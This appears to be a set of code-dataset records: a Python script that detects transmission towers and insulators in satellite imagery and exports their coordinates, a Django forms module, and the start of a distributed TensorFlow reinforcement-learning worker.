#定义存放坐标信息的空数组\r\n Map_write = []\r\n Geo_write = []\r\n box_write = []\r\n Geo_write_show = []\r\n do_insulator_list = '500'\r\n excel_path = './test.xls'\r\n with tf.Session(config=config) as sess:\r\n sess.run(init_op)\r\n if not restorer is None:\r\n restorer.restore(sess, restore_ckpt)\r\n print('restore model')\r\n\r\n for i, a_img_name in enumerate(real_test_imgname_list):\r\n\r\n raw_img = cv2.imread(a_img_name)\r\n one_data0 = np.unique(raw_img[:, :, 0])\r\n one_data1 = np.unique(raw_img[:, :, 1])\r\n one_data2 = np.unique(raw_img[:, :, 2])\r\n if one_data0.any() == [0] and one_data1.any() == [0] and one_data2.any() == [0]:\r\n # start = time.time()\r\n nake_name = a_img_name.split('/')[-1]\r\n cv2.imwrite(inference_save_path + '/' + nake_name,\r\n raw_img)\r\n # end = time.time()\r\n # tools.view_bar('{} image cost {}s'.format(a_img_name, (end - start)), i + 1,\r\n # len(real_test_imgname_list))\r\n else:\r\n start = time.time()\r\n resized_img, detected_boxes, detected_scores, detected_categories = \\\r\n sess.run(\r\n [img_batch, detection_boxes, detection_scores, detection_category],\r\n feed_dict={img_plac: raw_img[:, :, ::-1]} # cv is BGR. But need RGB\r\n )\r\n end = time.time()\r\n\r\n #show_indices = detected_scores >= cfgs.SHOW_SCORE_THRSHOLD\r\n if args.SateType == 'SV1':\r\n show_indices = detected_scores >= args.Threshold_SV1\r\n elif args.SateType == 'WV':\r\n show_indices = detected_scores >= args.Threshold_WV\r\n show_scores = detected_scores[show_indices]\r\n show_boxes = detected_boxes[show_indices]\r\n show_categories = detected_categories[show_indices]\r\n\r\n labes = np.ones(shape=[len(show_boxes), ], dtype=np.float32) * ONLY_DRAW_BOXES\r\n scores = np.zeros_like(labes)\r\n # 为了防止检测到的杆塔范围没有把杆塔囊括完,将检测框略微扩大\r\n if args.SateType == 'SV1':\r\n for i in range(0, len(show_boxes)):\r\n get_area_weight = show_boxes[i][2] - show_boxes[i][0]\r\n get_area_height = show_boxes[i][3] - show_boxes[i][1]\r\n if get_area_weight < 196:\r\n fit1 = (196 - get_area_weight) / 2\r\n show_boxes[i][0] = show_boxes[i][0] - fit1\r\n show_boxes[i][2] = show_boxes[i][2] + fit1\r\n if show_boxes[i][0] < 0:\r\n show_boxes[i][0] = 0\r\n if show_boxes[i][2] < 0:\r\n show_boxes[i][2] = 0\r\n if get_area_height < 196:\r\n fit2 = (196 - get_area_height) / 2\r\n show_boxes[i][1] = show_boxes[i][1] - fit2\r\n show_boxes[i][3] = show_boxes[i][3] + fit2\r\n if show_boxes[i][1] < 0:\r\n show_boxes[i][1] = 0\r\n if show_boxes[i][3] < 0:\r\n show_boxes[i][3] = 0\r\n img_get = raw_img\r\n img_box = img_get[int(show_boxes[i][1]):int(show_boxes[i][3]),\r\n int(show_boxes[i][0]):int(show_boxes[i][2]), :]\r\n cv2.imwrite('./Tower' + '/' + '%d_' % i + a_img_name.split('/')[-1],\r\n img_box)\r\n elif args.SateType == 'WV':\r\n for i in range(0, len(show_boxes)):\r\n get_area_weight = show_boxes[i][2] - show_boxes[i][0]\r\n get_area_height = show_boxes[i][3] - show_boxes[i][1]\r\n if get_area_weight < 300:\r\n fit1 = (300 - get_area_weight) / 2\r\n show_boxes[i][0] = show_boxes[i][0] - fit1\r\n show_boxes[i][2] = show_boxes[i][2] + fit1\r\n if show_boxes[i][0] < 0:\r\n show_boxes[i][0] = 0\r\n if show_boxes[i][2] < 0:\r\n show_boxes[i][2] = 0\r\n if get_area_height < 300:\r\n fit2 = (300 - get_area_height) / 2\r\n show_boxes[i][1] = show_boxes[i][1] - fit2\r\n show_boxes[i][3] = show_boxes[i][3] + fit2\r\n if show_boxes[i][1] < 0:\r\n show_boxes[i][1] = 0\r\n if show_boxes[i][3] < 0:\r\n show_boxes[i][3] = 0\r\n img_get = raw_img\r\n img_box = img_get[int(show_boxes[i][1]):int(show_boxes[i][3]),\r\n int(show_boxes[i][0]):int(show_boxes[i][2]), :]\r\n cv2.imwrite('./Tower' + '/' + '%d_' % i + a_img_name.split('/')[-1],\r\n img_box)\r\n #获取对应的坐标信息\r\n nake_name = a_img_name.split('/')[-1]\r\n out_dir_images = inference_save_path + '/' + nake_name\r\n mask_name = a_img_name.split('/')[-1]\r\n mask_name = mask_name.split('.')[0]\r\n Map_initial = assign_spatial_reference_byfile_coordinate(args.OutPath)\r\n name_split = nake_name.split('_')\r\n x_start = int(name_split[-4])\r\n y_start = int(name_split[-2])\r\n show_write = []\r\n del show_write[:]\r\n del Geo_write_show[:]\r\n for box in show_boxes:\r\n Map = Get_coordinate(Map_initial, box, x_start, y_start)\r\n Geo = geo2lonlat(args.OutPath, Map[0], Map[1], Map[2], Map[3])\r\n Map_write.append([nake_name, Map])\r\n Geo_write.append([nake_name, Geo])\r\n Geo_write_show.append([nake_name, Geo])\r\n box_write.append([nake_name, show_boxes])\r\n for one in Geo_write_show:\r\n if one[1]:\r\n lon = (one[1][0][1] + one[1][1][1]) / 2\r\n lat = (one[1][0][0] + one[1][1][0]) / 2\r\n _, tower_label_show, line_show = get_tower_label('./Tower_line.xls', lon, lat)\r\n show_write.append([line_show, tower_label_show])\r\n # final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(np.squeeze(resized_img, 0),\r\n # boxes=show_boxes,\r\n # labels=show_categories,\r\n # scores=show_scores,\r\n # tower_labels=show_write)\r\n final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(np.squeeze(resized_img, 0),\r\n boxes=show_boxes,\r\n labels=show_categories,\r\n scores=show_scores)\r\n\r\n cv2.imwrite(inference_save_path + '/' + nake_name,\r\n final_detections[:, :, ::-1])\r\n insulator_dir = './insulator/'\r\n Tower_dir = './Tower/'\r\n ### 产生问题原因为,mask图被覆盖了\r\n if args.DOInsulator == 'True':\r\n if show_write:\r\n if do_insulator_list in show_write[0][0]:\r\n # print('ssssssssssssssssssss')\r\n if len(show_boxes):\r\n if len(show_boxes) >1:\r\n for i in range(0, len(show_boxes)):\r\n insulator_detect()\r\n show_in_img_multi(args.save_cutdetect_dir + '/' + a_img_name.split('/')[-1], './insulator/' + '%d_' % i + mask_name + '.png', args.save_cutdetect_dir, show_boxes[i])\r\n\r\n # show_in_img_multi('./Test_result/' + a_img_name.split('/')[-1], './insulator/' + '%d_' % i + mask_name + '.png', './Test_result', show_boxes[i])\r\n del_file(insulator_dir)\r\n # del_file(Tower_dir)\r\n else:\r\n insulator_detect()\r\n show_in_img(args.save_cutdetect_dir + '/' + a_img_name.split('/')[-1], './insulator/' + '0_' + mask_name + '.png',\r\n args.save_cutdetect_dir, show_boxes)\r\n # show_in_img('./Test_result/' + a_img_name.split('/')[-1], './insulator/' + '0_' + mask_name + '.png',\r\n # './Test_result', show_boxes)\r\n del_file(insulator_dir)\r\n # del_file(Tower_dir)\r\n #分割后检测的影像会丢失地理坐标信息,这里和原图进行地理坐标信息的融合,检测后的影像也会带有地理坐标信息了\r\n out_dir_images = inference_save_path + '/' + nake_name\r\n assign_spatial_reference_byfile(args.OutPath, out_dir_images)\r\n Map_initial = assign_spatial_reference_byfile_coordinate(args.OutPath)\r\n tools.view_bar('{} image cost {}s'.format(a_img_name, (end - start)), (i + 1), len(real_test_imgname_list))\r\n ########################################\r\n #把坐标结果写到txt中\r\n with open(args.txt_save_dir + \"/\" + \"Map_Coordinate.txt\", \"w\") as f:\r\n for i in Map_write:\r\n f.write(str(i[0]))\r\n f.write(' ')\r\n if i[1]:\r\n f.write(str(i[1]))\r\n f.write('\\n')\r\n else:\r\n f.write(\"No tower\")\r\n f.write('\\n')\r\n f.close()\r\n with open(args.txt_save_dir + \"/\" + \"Geo_Coordinate.txt\", \"w\") as f:\r\n for i in Geo_write:\r\n f.write(str(i[0]))\r\n f.write(' ')\r\n if i[1]:\r\n lon = (i[1][0][1] + i[1][1][1]) / 2\r\n lat = (i[1][0][0] + i[1][1][0]) / 2\r\n _, tower_label, line = get_tower_label('./Tower_line.xls', lon, lat)\r\n f.write(str(i[1]))\r\n f.write(' ')\r\n f.write(str(line) + str(tower_label) + '号杆塔')\r\n f.write('\\n')\r\n else:\r\n f.write(\"No tower\")\r\n f.write('\\n')\r\n f.close()\r\n with open(args.txt_save_dir + \"/\" + \"box.txt\", \"w\") as f:\r\n for i in box_write:\r\n f.write(str(i[0]))\r\n f.write(' ')\r\n if i[1].any():\r\n f.write(str(i[1]))\r\n f.write('\\n')\r\n else:\r\n f.write(\"No tower\")\r\n f.write('\\n')\r\n f.close()\r\n\r\n\r\ndef inference(test_dir, inference_save_path):\r\n\r\n test_imgname_list = [os.path.join(test_dir, img_name) for img_name in os.listdir(test_dir)\r\n if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]\r\n assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \\\r\n ' Note that, we only support img format of (.jpg, .png, and .tiff) '\r\n if args.SateType == 'WV':\r\n faster_rcnn = build_whole_network_WV.DetectionNetwork(base_network_name=cfgs.NET_NAME,\r\n is_training=False)\r\n elif args.SateType == 'SV1':\r\n faster_rcnn = build_whole_network.DetectionNetwork(base_network_name=cfgs.NET_NAME,\r\n is_training=False)\r\n detect(det_net=faster_rcnn, inference_save_path=inference_save_path, real_test_imgname_list=test_imgname_list)\r\n\r\n\r\ndef parse_args():\r\n \"\"\"\r\n Parse input arguments\r\n \"\"\"\r\n parser = argparse.ArgumentParser(description='TestImgs...U need provide the test dir')\r\n parser.add_argument('InPath', type=str, help='影像输入路径')\r\n parser.add_argument('OutPath', type=str, help='输出路径')\r\n parser.add_argument('SateType', type=str, help='卫星类型,可选值为: SV1, GF2, GF1,WV。注:检测杆塔一定选择SV1或者WV模型,由于卫星分辨率目前只支持SV1、WV检测')\r\n parser.add_argument('ModType', type=str, help='模型类型,可选值为: WDSR, SRGAN, SRGAN_Noise')\r\n parser.add_argument('Stretch', type=str, help='是否灰度拉伸:True->拉伸, False->不拉伸。注:检测杆塔一定要拉伸')\r\n parser.add_argument('FakeColor', type=str, help='是否假彩色输出:True->假彩色输出, False->4通道输出。注:检测杆塔一定要假彩色输出')\r\n parser.add_argument('DoWhole', type=str, help='是否处理整景影像:'\r\n 'True->整景处理(适用于大幅影像), '\r\n 'False->处理部分影像(速度更快)')\r\n parser.add_argument('UseGPU', type=str, help='是否采用GPU处理:True->GPU处理, False->CPU处理')\r\n parser.add_argument('DoDetection', type=str, help='是否检测杆塔:True->检测杆塔, False->只进行超分')\r\n parser.add_argument('DOInsulator', type=str, help='是否检测绝缘子串:True->检测绝缘子串, False->只进行超分和杆塔识别')\r\n parser.add_argument('Savecutdetect', type=str, help='是否保留中间结果:True->保留, False->不保留')\r\n parser.add_argument('--Threshold_SV1', type=float, default=0.92, help='检测高景杆塔的阈值,可以根据检测结果自己调节,默认0.92')\r\n parser.add_argument('--Threshold_WV', type=float, default=0.96, help='检测Worldview杆塔的阈值,可以根据检测结果自己调节,默认0.96')\r\n parser.add_argument('--cut_data_dir', dest='cut_data_dir',\r\n help='超分过后影像存放的文件夹,用作检测杆塔的输入',\r\n default='./save', type=str)\r\n parser.add_argument('--save_cutdetect_dir', dest='save_cutdetect_dir',\r\n help='影像裁剪识别输出路径',\r\n default='./Test_result', type=str)\r\n parser.add_argument('--combine_save_data_dir', dest='combine_save_data_dir',\r\n help='检测结果存放的文件夹',\r\n default='./combine', type=str)\r\n parser.add_argument('--txt_save_dir', dest='txt_save_dir',\r\n help='坐标输出txt存放的文件夹,默认在程序目录的Txt,注:必须输入,因为只进行超分或超分和识别都需要输出',\r\n default='./Txt', type=str)\r\n parser.add_argument('--localhost', dest='localhost',\r\n help='回调地址,用于接收程序运行失败或者成功信息的地址',\r\n default='http://localhost:8091/inspection?taskId=1234', type=str)\r\n if len(sys.argv) == 1:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n args = parser.parse_args()\r\n update_config(config, args)\r\n\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n # #继承args输入参数\r\n args = parse_args()\r\n #超分部分\r\n # try:\r\n if args.UseGPU=='True':\r\n use_gpu = True\r\n GPU = '0'\r\n else:\r\n use_gpu = False\r\n GPU = '-1'\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = GPU\r\n if args.DoDetection == 'True':\r\n DoSR(args.InPath, args.ModType, args.OutPath, args.Stretch, args.FakeColor, args.SateType, args.DoWhole, use_gpu)\r\n #获取图片大小\r\n data_size = read_img_dt(args.OutPath)\r\n #裁剪图片大小\r\n cut_save_data_dir = './Out'\r\n data_dir = './Out/'\r\n # test_results_save_dir = './Test_result'\r\n if not os.path.exists(cut_save_data_dir):\r\n os.mkdir(cut_save_data_dir)\r\n if not os.path.exists(args.save_cutdetect_dir):\r\n os.mkdir(args.save_cutdetect_dir)\r\n cut(args.cut_data_dir, cut_save_data_dir, file_type=['tif', 'tiff'], out_type='tif', out_size=1024)\r\n inference(data_dir,\r\n inference_save_path=args.save_cutdetect_dir)\r\n combine(args.save_cutdetect_dir, w=data_size.shape[1], h=data_size.shape[2], c=3, out_dir=args.combine_save_data_dir, out_type='tif', file_type=['tif'])\r\n #检测过后,清除裁剪的图片\r\n for root, dirs, files in os.walk(cut_save_data_dir):\r\n for name in files:\r\n if name.endswith(\".tif\"):\r\n os.remove(os.path.join(root, name))\r\n if args.Savecutdetect == 'False':\r\n del_file(args.save_cutdetect_dir)\r\n with open(args.txt_save_dir + \"/\" + \"Finished.txt\", \"w\") as f:\r\n f.write(\"Finished!\")\r\n else:\r\n DoSR(args.InPath, args.ModType, args.OutPath, args.Stretch, args.FakeColor, args.SateType, args.DoWhole,\r\n use_gpu)\r\n with open(args.txt_save_dir + \"/\" + \"Finished.txt\", \"w\") as f:\r\n f.write(\"Finished!\")\r\n # try:\r\n # print('Program Successed,the success message is being passed to the callback address')\r\n # requests.get(args.localhost + '&status=success')\r\n # print('callback send successfully!')\r\n # except:\r\n # print('Error in callback address passing')\r\n # except:\r\n # try:\r\n # print('Program error,the failure message is being passed to the callback address')\r\n # requests.get(args.localhost + '&status=fail')\r\n # print('callback send successfully!')\r\n # except:\r\n # print('Error in callback address passing')","repo_name":"hardworking-jws/insulator-detection-remote-sensing","sub_path":"Tools/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":77721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21153123181","text":"from django import forms\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom django.forms.widgets import HiddenInput\n\nfrom publication.models import Book, Category, Issue, Periodical, Publisher, \\\n PUBLICATION_TYPES\n\n\nclass PublisherForm(forms.ModelForm):\n class Meta:\n model = Publisher\n fields = ('name', 'address', 'telephone', 'website')\n\n\nclass BookForm(forms.ModelForm):\n file_upload = forms.FileField()\n book_id = forms.CharField(widget=HiddenInput)\n\n def clean(self):\n if self.cleaned_data.has_key('book_id'): # update\n if self._errors.has_key('file_upload'):\n del self._errors['file_upload'] # file upload isn't required\n else: # create\n del self._errors['book_id']\n return self.cleaned_data\n\n class Meta:\n model = Book\n exclude = ('publisher', 'status', 'pending_until', 'categories')\n\n\nclass PeriodicalForm(forms.ModelForm):\n class Meta:\n model = Periodical\n exclude = ('periodical_type', 'publisher', 'categories')\n\n\nclass IssueForm(forms.ModelForm):\n file_upload = forms.FileField()\n issue_id = forms.CharField(widget=HiddenInput)\n\n def clean(self):\n if self.cleaned_data.has_key('issue_id'): # update\n if self._errors.has_key('file_upload'):\n del self._errors['file_upload'] # file upload isn't required\n else: # create\n del self._errors['issue_id']\n return self.cleaned_data\n\n class Meta:\n model = Issue\n exclude = ('periodical', 'status', 'pending_until')\n widgets = {\n 'issued_at': SelectDateWidget()\n }\n\n\nclass CategoryForm(forms.ModelForm):\n class Meta:\n model = Category\n","repo_name":"opendream/openreader","sub_path":"publication/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"43347304358","text":"from scipy import special\nfrom tempfile import TemporaryDirectory\nimport png\nimport environment\nfrom replay_buffer import Buffer\nimport socket\nimport multiprocessing\nimport subprocess\nimport numpy as np\nfrom numpy import pi, log\nimport tensorflow as tf\nimport tensorflow.contrib.layers as tl\nimport time\nimport viewer\nimport os\nimport filelock\n\n\ndef actions_dict_from_array(actions):\n return {\n \"Arm1_to_Arm2_Left\": actions[0],\n \"Ground_to_Arm1_Left\": actions[1],\n \"Arm1_to_Arm2_Right\": actions[2],\n \"Ground_to_Arm1_Right\": actions[3]\n }\n\n\ndef lrelu(x):\n alpha = 0.2\n return tf.nn.relu(x) * (1 - alpha) + x * alpha\n\n\ndef exponential_moving_stats(ten, alpha):\n mean, var = tf.nn.moments(ten, axes=0)\n std = tf.sqrt(var)\n moving_mean = tf.Variable(tf.zeros_like(mean))\n moving_mean_assign = moving_mean.assign(alpha * moving_mean + (1 - alpha) * mean)\n moving_std = tf.Variable(tf.ones_like(std))\n moving_std_assign = moving_std.assign(alpha * moving_std + (1 - alpha) * std)\n cond = tf.less(tf.shape(ten)[0], 2)\n moving_mean_cond = tf.cond(cond, lambda: moving_mean, lambda: moving_mean_assign)\n moving_std_cond = tf.cond(cond, lambda: moving_std, lambda: moving_std_assign)\n return moving_mean_cond, moving_std_cond\n\n\ndef normalize(ten, alpha):\n mean, std = exponential_moving_stats(ten, alpha)\n return (ten - mean) / (std + 1e-5)\n\n\ndef get_cluster(n_parameter_servers, n_workers):\n spec = {}\n port = get_available_port(2222)\n for i in range(n_parameter_servers):\n if \"ps\" not in spec:\n spec[\"ps\"] = []\n spec[\"ps\"].append(\"localhost:{}\".format(i + port))\n for i in range(n_workers):\n if \"worker\" not in spec:\n spec[\"worker\"] = []\n spec[\"worker\"].append(\"localhost:{}\".format(i + port + n_parameter_servers))\n return tf.train.ClusterSpec(spec)\n\n\ndef is_port_in_use(port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex(('localhost', port)) == 0\n\n\ndef get_available_port(start_port=6006):\n port = start_port\n while is_port_in_use(port):\n port += 1\n return port\n\n\nclass Worker:\n def __init__(self, task_index, pipe, env, cluster, logdir, discount_factor, sequence_length, reward_params,\n model_lr, critic_lr, actor_lr, model_buffer_size):\n self.task_index = task_index\n self.cluster = cluster\n self._n_workers = self.cluster.num_tasks(\"worker\") - 1\n self.job_name = \"worker\"\n self.server = tf.train.Server(cluster, self.job_name, task_index)\n self.name = \"/job:{}/task:{}\".format(self.job_name, task_index)\n self.device = tf.train.replica_device_setter(worker_device=self.name, cluster=cluster)\n self.env = env\n self.discount_factor = discount_factor\n self.sequence_length = sequence_length\n self.reward_params = reward_params\n self.model_lr = model_lr\n self.critic_lr = critic_lr\n self.actor_lr = actor_lr\n self.model_buffer_size = model_buffer_size\n self.pipe = pipe\n self.define_networks()\n self.logdir = logdir\n # graph = tf.get_default_graph() if task_index == 0 else None\n graph = None\n self.summary_writer = tf.summary.FileWriter(self.logdir + \"/worker{}\".format(task_index), graph=graph)\n self.saver = tf.train.Saver()\n self.sess = tf.Session(target=self.server.target)\n if task_index == 0 and len(self.sess.run(tf.report_uninitialized_variables())) > 0: # todo: can be done in Experiment\n self.sess.run(tf.global_variables_initializer())\n print(\"{} variables initialized\".format(self.name))\n\n def get_model_state(self):\n # returns a state from the environment\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def get_rl_state(self):\n # returns a state from the environment\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def to_rl_feed_dict(self, **kwargs):\n # transforms the inputs into a feed dict for the actor\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def to_model_feed_dict(self, **kwargs):\n # transforms the inputs into a feed dict for the actor\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def define_net_dims(self):\n # must define:\n # - self.model_net_dim\n # - self.rl_shared_net_dim\n # - self.actor_remaining_net_dim\n # - self.critic_remaining_net_dim\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def define_reward(self, **params):\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def define_networks(self):\n raise NotImplementedError(\"This method must be overwritten.\")\n\n def wait_for_variables_initialization(self):\n while len(self.sess.run(tf.report_uninitialized_variables())) > 0:\n print(\"{} waiting for variable initialization...\".format(self.name))\n time.sleep(1)\n\n def __call__(self):\n cmd = self.pipe.recv()\n while not cmd == \"done\":\n print(\"{} got command {}\".format(self.name, cmd))\n self.__getattribute__(cmd[0])(*cmd[1:])\n cmd = self.pipe.recv()\n\n def save(self, path):\n save_path = self.saver.save(self.sess, path + \"/network.ckpt\")\n self.pipe.send(\"{} saved model to {}\".format(self.name, save_path))\n\n def restore(self, path):\n self.saver.restore(self.sess, os.path.normpath(path + \"/network.ckpt\"))\n self.pipe.send(\"{} variables restored from {}\".format(self.name, path))\n\n def run_reinforcement_learning(self, n_updates, train_actor=True):\n global_rl_step = self.sess.run(self.global_rl_step)\n n_updates += global_rl_step\n while global_rl_step < n_updates - self._n_workers:\n # Collect some experience\n transitions = self.run_n_rl_steps()\n # Update the global networks\n global_rl_step = self.update_reinforcement_learning(*transitions, train_actor=train_actor)\n self.summary_writer.flush()\n self.pipe.send(\"{} going IDLE\".format(self.name))\n\n def run_all(self, n_updates, train_actor=True):\n global_rl_step = self.sess.run(self.global_rl_step)\n n_updates += global_rl_step\n while global_rl_step < n_updates - self._n_workers:\n # Collect some experience\n transitions = self.run_n_rl_steps()\n # Update the global networks\n global_rl_step = self.update_all(*transitions, train_actor=train_actor)\n self.summary_writer.flush()\n self.pipe.send(\"{} going IDLE\".format(self.name))\n\n def run_display(self, training=True):\n win = viewer.JointAgentWindow(self.discount_factor, return_lookback=50)\n while not self.pipe.poll():\n self.run_n_display_steps(win, training)\n win.close()\n self.pipe.recv() # done\n self.pipe.send(\"{} (display) going IDLE\".format(self.name))\n\n def run_video(self, path, n_sequences, training=True):\n start_index = 0\n with TemporaryDirectory() as tmppath:\n while not os.path.isdir(tmppath):\n time.sleep(0.1)\n for i in range(n_sequences):\n start_index = self.run_n_video_steps(tmppath, start_index, training=training)\n os.system(\"ffmpeg -loglevel panic -r 24 -i {}/frame_%06d.png -vcodec mpeg4 -b 100000 -y {}\".format(tmppath, path))\n self.pipe.send(\"{} saved video under {}\".format(self.name, path))\n\n def save_contact_logs(self, name):\n path = self.logdir + \"/worker{}/contacts_{}.pkl\".format(self.task_index, name)\n self.env.save_contact_logs(path)\n self.pipe.send(\"{} saved contact logs under {}\".format(self.name, path))\n\n def run_model(self, n_updates):\n global_model_step = self.sess.run(self.global_model_step)\n n_updates += global_model_step\n while global_model_step < n_updates - self._n_workers:\n # Collect some experience\n states = self.run_n_model_steps()\n # Update the global networks\n global_model_step = self.update_model(states)\n self.summary_writer.flush()\n self.pipe.send(\"{} going IDLE\".format(self.name))\n\n def get_action(self):\n state = self.get_rl_state()\n feed_dict = self.to_rl_feed_dict(states=[state])\n action = self.sess.run(self.action_applied_in_env, feed_dict=feed_dict)\n # action, sai, sap = self.sess.run([self.action_applied_in_env, self.stochastic_actions_indices, self.probs], feed_dict=feed_dict)\n # feed_dict[self.actions] = action\n # picked_probs, ai = self.sess.run([self.picked_probs, self.actions_indices], feed_dict=feed_dict)\n # if (sai != ai).any():\n # print(\"{} : \\n{}\\n{}\\n{}\\n{}\\n\".format(self.name, picked_probs[0], sap[0], sai[0], ai[0]))\n # if (picked_probs < 1e-4).any():\n # print(\"{} picked an action with very low probability (<1e-4): \\n{}\\n{}\\n{}\\n{}\\n\".format(self.name, picked_probs[0], sap[0], sai[0], ai[0]))\n return action[0]\n\n def run_n_rl_steps(self):\n model_states = []\n states = []\n actions = []\n for _ in range(self.sequence_length):\n # get action\n action = self.get_action()\n actions.append(action)\n # set action\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # get states\n model_states.append(self.get_model_state())\n states.append(self.get_rl_state())\n # run environment step\n self.env.env_step()\n model_states.append(self.get_model_state())\n return model_states, states, actions\n\n def run_n_model_steps(self):\n states = []\n for _ in range(self.sequence_length):\n # get action\n action = self.get_action()\n # run action in env\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # get state\n states.append(self.get_model_state())\n # run environment step\n self.env.env_step()\n return states\n\n # TODO put that function in the subclass\n def run_n_display_steps(self, win, training=True):\n action_return_fetches = [self.action_applied_in_env if training else self.greedy_actions, self.critic_value]\n predicted_positions_reward_fetches = [self.model_outputs, self.rewards]\n args_list = [None] * self.sequence_length\n rewards = np.zeros(self.sequence_length)\n for i in range(self.sequence_length):\n rl_feed_dict = self.to_rl_feed_dict(states=[self.get_rl_state()])\n actions, predicted_returns = self.sess.run(action_return_fetches, feed_dict=rl_feed_dict)\n action = actions[0]\n predicted_return = predicted_returns[0]\n # set positions in env\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # get action and predicted return\n model_states = [self.get_model_state()]\n # get current positions\n current_positions = self.env.discrete_positions\n # get target positions\n target_positions = self.env.discrete_target_positions\n # run action in env\n self.env.env_step()\n # get current vision\n vision = self.env.vision\n # get current positions\n next_positions = self.env.discrete_positions\n # get predicted positions and reward\n model_states.append(self.get_model_state())\n model_feed_dict = self.to_model_feed_dict(states=model_states[:-1], next_states=model_states[1:])\n predicted_positions, current_rewards = self.sess.run(predicted_positions_reward_fetches, feed_dict=model_feed_dict)\n current_reward = current_rewards[0]\n predicted_positions = predicted_positions[0].reshape((4, -1))\n # display\n args = [\n vision,\n current_positions,\n target_positions,\n predicted_positions,\n next_positions,\n current_reward,\n predicted_return]\n args_list[i] = args\n rewards[i] = current_reward\n win(*args)\n indices = np.argsort(rewards) #[-self.sequence_length // 10:]\n # for args in args_list:\n # win(*args)\n # for i in indices:\n # if i != 0:\n # win(*args_list[i - 1])\n # win(*args_list[i])\n\n def run_n_video_steps(self, path, start_index, training=True):\n action_fetches = self.action_applied_in_env if training else self.greedy_actions\n for i in range(self.sequence_length):\n rl_feed_dict = self.to_rl_feed_dict(states=[self.get_rl_state()])\n actions = self.sess.run(action_fetches, feed_dict=rl_feed_dict)\n action = actions[0]\n # set positions in env\n action_dict = actions_dict_from_array(action)\n self.env.set_positions(action_dict)\n # run action in env\n self.env.env_step()\n # get current vision\n vision = self.env.vision\n # save\n data = vision.reshape(vision.shape[0], -1)\n png.from_array(data, \"RGB\").save(path + \"/frame_{:06d}.png\".format(start_index + i))\n return start_index + i + 1\n\n def rewards_to_return(self, rewards, prev_return=0):\n returns = np.zeros_like(rewards)\n for i in range(len(rewards) - 1, -1, -1):\n r = rewards[i]\n prev_return = r + self.discount_factor * prev_return\n returns[i] = prev_return\n return returns\n\n def update_reinforcement_learning(self, model_states, rl_states, actions, train_actor=True):\n feed_dict = self.to_model_feed_dict(states=model_states[:-1], next_states=model_states[1:])\n rewards, model_summary = self.sess.run([self.rewards, self.model_summary_at_rl], feed_dict=feed_dict)\n feed_dict = self.to_rl_feed_dict(states=rl_states, actions=actions, rewards=rewards)\n train_op = self.rl_train_op if train_actor else self.critic_train_op\n fetches = [self.actor_loss, self.critic_loss, self.global_rl_step_inc, train_op, self.rl_summary]\n aloss, closs, global_rl_step, _, rl_summary = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(model_summary, global_step=global_rl_step)\n self.summary_writer.add_summary(rl_summary, global_step=global_rl_step)\n if global_rl_step % 100 <= self._n_workers:\n self.summary_writer.flush()\n print(\"{} finished update number {} (actor loss = {:.3f} critic loss = {:.3f})\".format(\n self.name, global_rl_step, aloss, closs))\n return global_rl_step\n\n def update_model(self, states):\n self.model_buffer.incorporate(states[:-1], states[1:])\n states, next_states = self.model_buffer.batch(len(states) - 1)\n feed_dict = self.to_model_feed_dict(states=states, next_states=next_states)\n fetches = [self.model_loss, self.global_model_step_inc, self.model_train_op, self.model_summary]\n loss, global_model_step, _, model_summary = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(model_summary, global_step=global_model_step)\n if global_model_step % 100 <= self._n_workers:\n self.summary_writer.flush()\n print(\"{} finished update number {} (loss = {:.3f})\".format(self.name, global_model_step, loss))\n return global_model_step\n\n def update_all(self, model_states, rl_states, actions, train_actor=True):\n # train model with buffered data\n self.model_buffer.incorporate(model_states[:-1], model_states[1:])\n states, next_states = self.model_buffer.batch(len(model_states) - 1)\n fetches = [self.model_train_op, self.model_summary, self.global_rl_step]\n feed_dict = self.to_model_feed_dict(states=states, next_states=next_states)\n _, model_summary, global_rl_step = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(model_summary, global_step=global_rl_step)\n # record reward / model loss at rl time\n feed_dict = self.to_model_feed_dict(states=model_states[:-1], next_states=model_states[1:])\n fetches = [self.rewards, self.model_loss, self.model_summary_at_rl]\n rewards, mloss, model_summary = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(model_summary, global_step=global_rl_step)\n feed_dict = self.to_rl_feed_dict(states=rl_states, actions=actions, rewards=rewards)\n train_op = self.rl_train_op if train_actor else self.critic_train_op\n fetches = [self.actor_loss, self.critic_loss, self.global_rl_step_inc, train_op, self.rl_summary]\n aloss, closs, global_rl_step_inc, _, rl_summary = self.sess.run(fetches, feed_dict=feed_dict)\n self.summary_writer.add_summary(rl_summary, global_step=global_rl_step)\n if global_rl_step % 100 <= self._n_workers:\n self.summary_writer.flush()\n print(\"{} finished update number {} (model loss = {:.3f} critic loss = {:.3f})\".format(\n self.name, global_rl_step, mloss, closs))\n return global_rl_step\n\n\nclass JointAgentWorker(Worker):\n def define_networks(self):\n self.define_net_dims()\n self.define_replay_buffer()\n with tf.device(self.device):\n # define model\n self.define_model()\n # define reinforcement learning\n 